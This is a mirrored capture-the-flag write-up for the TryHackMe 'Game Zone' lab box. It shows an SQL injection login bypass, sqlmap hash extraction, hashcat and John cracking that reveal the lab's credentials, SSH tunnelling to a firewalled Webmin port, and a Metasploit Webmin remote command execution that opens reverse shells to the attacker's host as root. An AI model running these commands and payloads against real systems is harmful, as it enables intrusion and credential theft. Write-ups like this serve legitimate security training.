mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-09-20 14:21:55 +00:00
20 KiB
20 KiB
TryHackMe-Game Zone
NMAP
Nmap scan report for 10.10.76.196
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
| 256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_ 256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Game Zone
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
PORT 80
This page is vulnerable to sqli , lets test it using username as ' or 1=1 -- and leaving the password blank
Burpsuite
Lets use burp to capture the search request on page portal.php in order to send it to sqlmap to exilftrate data.
Save the whole request in a text file
Sqlmap
Obtained sha256 hash agent47:ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
Hashcat
hashcat -a 0 -m 1400 --user hash /usr/share/wordlists/rockyou.txt
Here -a is the attack mode which is set to Straight and -m tells the hashing algorithm in which it is sha2-256
Session..........: hashcat
Status...........: Cracked
Hash.Name........: SHA2-256
Hash.Target......: ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218...3efd14
Time.Started.....: Thu Nov 5 21:26:24 2020 (1 sec)
Time.Estimated...: Thu Nov 5 21:26:25 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2992.0 kH/s (0.78ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 2891776/14344385 (20.16%)
Rejected.........: 0/2891776 (0.00%)
Restore.Point....: 2887680/14344385 (20.13%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: vikes! -> vida82vida82
root@kali:~/TryHackMe/Easy/Game Zone# hashcat -a 0 -m 1400 --user --show hash
agent47:ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14:videogamer124
JohnTheRipper
john hash --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "gost", but the string is also recognized as "HAVAL-256-3"
Use the "--format=HAVAL-256-3" option to force loading these as that type instead
Warning: detected hash type "gost", but the string is also recognized as "Panama"
Use the "--format=Panama" option to force loading these as that type instead
Warning: detected hash type "gost", but the string is also recognized as "po"
Use the "--format=po" option to force loading these as that type instead
Warning: detected hash type "gost", but the string is also recognized as "Raw-Keccak-256"
Use the "--format=Raw-Keccak-256" option to force loading these as that type instead
Warning: detected hash type "gost", but the string is also recognized as "Raw-SHA256"
Use the "--format=Raw-SHA256" option to force loading these as that type instead
Warning: detected hash type "gost", but the string is also recognized as "skein-256"
Use the "--format=skein-256" option to force loading these as that type instead
Warning: detected hash type "gost", but the string is also recognized as "Snefru-256"
Use the "--format=Snefru-256" option to force loading these as that type instead
Warning: detected hash type "gost", but the string is also recognized as "Stribog-256"
Use the "--format=Stribog-256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (gost, GOST R 34.11-94 [64/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:08 DONE (2020-11-05 21:30) 0g/s 1639Kp/s 1639Kc/s 1639KC/s !!12Honey..*7¡Vamos!
Session completed
john --show --format=RAW-SHA256 hash
agent47:videogamer124
So you can use both to crack hashes
SSH (PORT 22)
Now we have the username agent47 and passowrd videogamer124 we can ssh into the box
Reverse SSH Port Forwarding
Reverse SSH port forwarding specifies that the given port on the remote server host is to be forwarded to the given host and port on the local side.
-L is a local tunnel (YOU <-- CLIENT). If a site was blocked, you can forward the traffic to a server you own and view it. For example, if imgur was blocked at work, you can do ssh -L 9000:imgur.com:80 user@example.com. Going to localhost:9000 on your machine, will load imgur traffic using your other server.
-R is a remote tunnel (YOU --> CLIENT). You forward your traffic to the other server for others to view. Similar to the example above, but in reverse.
Run ss -tulpn
agent47@gamezone:~$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 *:10000 *:*
udp UNCONN 0 0 *:68 *:*
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 128 *:10000 *:*
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 128 :::22 :::
There are 5 tcp ports running
We can see that a service running on port 10000 is blocked via a firewall rule from the outside (we can see this from the IPtable list). However, Using an SSH Tunnel we can expose the port to us (locally)!
From our local machine, run ssh -L 10000:localhost:10000 @
Once complete, in your browser type "localhost:10000" and you can access the newly-exposed webserver.
PORT 10000
Login with the same crdentials (agent47:videogamer124)
Metasploit
msf5 > search webmin 1.580
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/webmin/edit_html_fileaccess 2012-09-06 normal No Webmin edit_html.cgi file Parameter Traversal Arbitrary File A
ccess
1 auxiliary/admin/webmin/file_disclosure 2006-06-30 normal No Webmin File Disclosure
2 exploit/linux/http/webmin_backdoor 2019-08-10 excellent Yes Webmin password_change.cgi Backdoor
3 exploit/linux/http/webmin_packageup_rce 2019-05-16 excellent Yes Webmin Package Updates Remote Command Execution
4 exploit/unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution
5 exploit/unix/webapp/webmin_upload_exec 2019-01-17 excellent Yes Webmin Upload Authenticated RCE
Interact with a module by name or index, for example use 5 or use exploit/unix/webapp/webmin_upload_exec
msf5 > use 4
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > show options
Module options (exploit/unix/webapp/webmin_show_cgi_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD videogamer124 yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS lo yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 10000 yes The target port (TCP)
SSL false yes Use SSL
USERNAME agent47 yes Webmin Username
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Webmin 1.580
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > exploit
[-] Exploit failed: An exploitation error occurred.
[*] Exploit completed, but no session was created.
This didn't worked because we didn't set the unix payload
set PAYLOAD cmd/unix/reverse
Module options (exploit/unix/webapp/webmin_show_cgi_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD videogamer124 yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS localhost yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 10000 yes The target port (TCP)
SSL false yes Use SSL
USERNAME agent47 yes Webmin Username
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.14.3.143 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Webmin 1.580
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > exploit
[*] Exploiting target 0.0.0.1
[*] Started reverse TCP double handler on 10.14.3.143:4444
[*] Attempting to login...
[-] Authentication failed
[*] Exploiting target 127.0.0.1
[*] Started reverse TCP double handler on 10.14.3.143:4444
[*] Attempting to login...
[+] Authentication successfully
[+] Authentication successfully
[*] Attempting to execute the payload...
[+] Payload executed successfully
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo IMGwgkPDtJucxdvk;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "IMGwgkPDtJucxdvk\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.14.3.143:4444 -> 10.10.76.196:40646) at 2020-11-05 22:49:31 +0500
[*] Session 1 created in the background.
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 10.14.3.143:4444 -> 10.10.76.196:40646 (127.0.0.1)
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > sessions -i 1
[*] Starting interaction with 1...
pwd
/usr/share/webmin/file/
id
uid=0(root) gid=0(root) groups=0(root)
Upgrading shell to meterpreter
[*] Upgrading session ID: 1
pwd
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.14.3.143:4433
[*] Sending stage (980808 bytes) to 10.10.76.196
[*] Meterpreter session 2 opened (10.14.3.143:4433 -> 10.10.76.196:44438) at 2020-11-05 22:57:31 +0500
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
msf5 post(multi/manage/shell_to_meterpreter) > pwd
[*] exec: pwd
/root/TryHackMe/Easy/Game Zone
msf5 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 10.14.3.143:4444 -> 10.10.76.196:40646 (127.0.0
.1)
2 meterpreter x86/linux no-user @ gamezone (uid=0, gid=0, euid=0, egid=0) @ 10.10.76.196 10.14.3.143:4433 -> 10.10.76.196:44438 (10.10.7
6.196)
msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > pwd
/root
meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > getuid
Server username: no-user @ gamezone (uid=0, gid=0, euid=0, egid=0)
meterpreter >